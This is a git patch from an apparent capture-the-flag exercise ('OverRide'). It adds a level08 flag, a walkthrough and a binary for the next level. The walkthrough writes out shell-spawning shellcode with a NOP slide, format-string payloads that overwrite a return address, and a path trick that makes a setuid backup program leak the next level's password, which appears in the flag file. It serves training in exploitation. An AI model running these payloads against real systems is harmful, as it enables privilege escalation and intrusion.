From 17686e16d30f5a208a9d0c85bde79c008f9f6404 Mon Sep 17 00:00:00 2001 From: gbrochar Date: Tue, 1 Jul 2025 15:26:11 +0200 Subject: [PATCH] feat: level08 + level09 elf --- level08/flag | 1 + level08/walkthrough | 44 +++++++++++++++++++++++++++++++++++++ level09/Ressources/level09 | Bin 0 -> 12959 bytes 3 files changed, 45 insertions(+) create mode 100644 level08/flag create mode 100644 level08/walkthrough create mode 100755 level09/Ressources/level09 diff --git a/level08/flag b/level08/flag new file mode 100644 index 0000000..7301e9e --- /dev/null +++ b/level08/flag @@ -0,0 +1 @@ +fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S diff --git a/level08/walkthrough b/level08/walkthrough new file mode 100644 index 0000000..06b88df --- /dev/null +++ b/level08/walkthrough @@ -0,0 +1,44 @@ +load shellcode in env with nop slide + +level08@OverRide:~$ echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" > shellcode.bin +level08@OverRide:~$ export SHELLCODE=$(cat shellcode.bin) +level08@OverRide:~$ + + +(gdb) p (char *)getenv("SHELLCODE") +$1 = 0xffffffffffffe892
+ +need to override ret pointer with 0xffffffffffffe892. For this we are going to write e892, then ffff 3 times. Kinda like level05. we will override log_wrapper ret addr cause its fastest. + +Better version (file doesn't need to exist as log_wrapper is called before fopen) + +level08@OverRide:~$ env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%11\$9x'*20)") +ERROR: Failed to open AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x +level08@OverRide:~$ cat backups/.log +LOG: Starting back up: AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 +level08@OverRide:~$ + +with env -i : +Breakpoint 1, 0x0000000000400a5a in main () +(gdb) p (char *)getenv("SHELLCODE") +$1 = 0xffffffffffffef79
+ + + +env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABB\xc8\xeb\xff\xff\xff\x7f\x00\x00DDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%17lx'*10+'%n')") + + +actually its way simpler T_T : + +level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/ +level08@OverRide:~$ cd /tmp +level08@OverRide:/tmp$ ~/level08 /home/users/level09/pass +ERROR: Failed to open /home/users/level09/pass +level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass +level08@OverRide:/tmp$ cat backups/ +home/ .log +level08@OverRide:/tmp$ cat backups/home/users/level09/.pass +fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S +level08@OverRide:/tmp$ exit +logout +Connection to localhost closed. diff --git a/level09/Ressources/level09 b/level09/Ressources/level09 new file mode 100755 index 0000000000000000000000000000000000000000..57c0d8fd40ca4b277da3b0383c6cfa6b6271a683 GIT binary patch literal 12959 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 literal 0 HcmV?d00001